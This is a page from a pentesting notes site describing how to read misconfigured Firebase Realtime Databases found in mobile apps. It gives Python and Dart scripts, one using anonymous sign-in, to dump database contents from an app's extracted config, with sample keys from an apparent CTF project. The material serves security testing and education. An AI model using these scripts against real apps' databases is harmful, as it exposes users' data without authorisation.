PwnSec Notes
  • AppSec
    • General Notes
    • Payloads
    • Fuzzing
    • Code Review
    • ReDos
    • SSTI
    • LFI-RFI
    • PHP Tricks
    • Javascript
    • Serialization
    • SQL Injection
    • JWT
    • GraphQL
    • Side Channel
    • Command Execution
    • WebSockets
    • Ruby
    • 0Auth
    • Latex Injection
    • NoSQL
    • JS Analysis
    • Apache Lucene
  • Forensics
    • Basics
    • Network Captures
    • Windows Logs
    • Memory
    • Browser
    • Threat Intelligence
    • Disk
  • Binary-Exploitation
    • Concepts
    • Binary Analysis
    • Debugging
    • Shellcodes
  • Malware-Analysis
    • Memory Mapping
    • Macros
    • Unpacking
    • Analysis
    • Resources
  • Reverse-Engineering
    • GDB basics
    • MASM Basics
    • Decompilers
    • Useful Codes
  • Services
    • SNMP
    • Grafana
    • Consul
  • Network Pentesting
    • C2 Servers
    • Pivoting
    • CrackMapExec
    • Kubernetes
    • Docker
  • MISC
    • Slack
    • Git
    • Pyjails
    • Privilege Escalation
    • Python LOL Code
  • Cloud Hacking
    • AWS S3
    • AWS Cognito
  • Mobile Pentesting
    • Frida
    • ADB
    • Drozer
    • Smali
    • Static Analysis
    • Dynamic Analysis
    • Bypass SSL Pinning
    • APK Labs
    • Android Malwares
    • Abusing Firebase
    • Root Detection
Powered by GitBook
On this page
  1. Mobile Pentesting

Abusing Firebase

PreviousAndroid MalwaresNextRoot Detection

Last updated 1 year ago

Firebase provides detailed documentation and cross-platform app development SDKs, to help you build and ship apps for iOS, Android, the web, Flutter, Unity, and C++. The Firebase Realtime Database is a cloud-hosted database. Data is stored as JSON and synchronized in realtime to every connected client.

Some mobile applications that have firebase its Firebase is not restricted and can be accessed to its database by simple curl command

If the firebase is configured to depend on specific values such as:

    appId: "1:713169998830:android:ee341ad82ed5dd924534ff",
    apiKey: "AIzaSyD3Z8qvgV-XdvDaeX-hnM8sOHXPhV_vIsw",
    messagingSenderId: "",
    authDomain: "my-ctf-2e70b-default-rtdb.firebaseapp.com",
    databaseURL: "https://my-ctf-2e70b-default-rtdb.firebaseio.com",
    storageBucket: "my-ctf-2e70b.appspot.com",
    projectId: "my-ctf-2e70b"

you can use 2 methods it depends on if it needs anonymous login or not

Without anonymous login (Python):

import pyrebase

config = {
  "apiKey": "FIREBASE_API_KEY",
  "authDomain": "FIREBASE_AUTH_DOMAIN_ID.firebaseapp.com",
  "databaseURL": "https://FIREBASE_AUTH_DOMAIN_ID.firebaseio.com",
  "storageBucket": "FIREBASE_AUTH_DOMAIN_ID.appspot.com",
}

firebase = pyrebase.initialize_app(config)

db = firebase.database()

print(db.get())

With anonymous login (Dart):

import 'dart:convert';
import 'dart:io';
import 'dart:typed_data';

import 'package:firebase_dart/auth.dart';
import 'package:firebase_dart/core.dart';
import 'package:firebase_dart/database.dart';
import 'package:firebase_dart/implementation/pure_dart.dart';
import 'package:firebase_dart/storage.dart';

void main() async {
  FirebaseDart.setup();

  var options = FirebaseOptions(
    appId: "1:713169998830:android:ee341ad82ed5dd924534ff",
    apiKey: "AIzaSyD3Z8qvgV-XdvDaeX-hnM8sOHXPhV_vIsw",
    messagingSenderId: "",
    authDomain: "my-ctf-2e70b-default-rtdb.firebaseapp.com",
    databaseURL: "https://my-ctf-2e70b-default-rtdb.firebaseio.com",
    storageBucket: "my-ctf-2e70b.appspot.com",
    projectId: "my-ctf-2e70b"
      );

  var app = await Firebase.initializeApp(options: options);
  var auth = FirebaseAuth.instanceFor(app: app);
  await auth.signInAnonymously();
  var database = FirebaseDatabase(app: app);
  var dbRef = database.reference();
  var snap = await dbRef.once();

  print('Flag : ${snap.value}');
}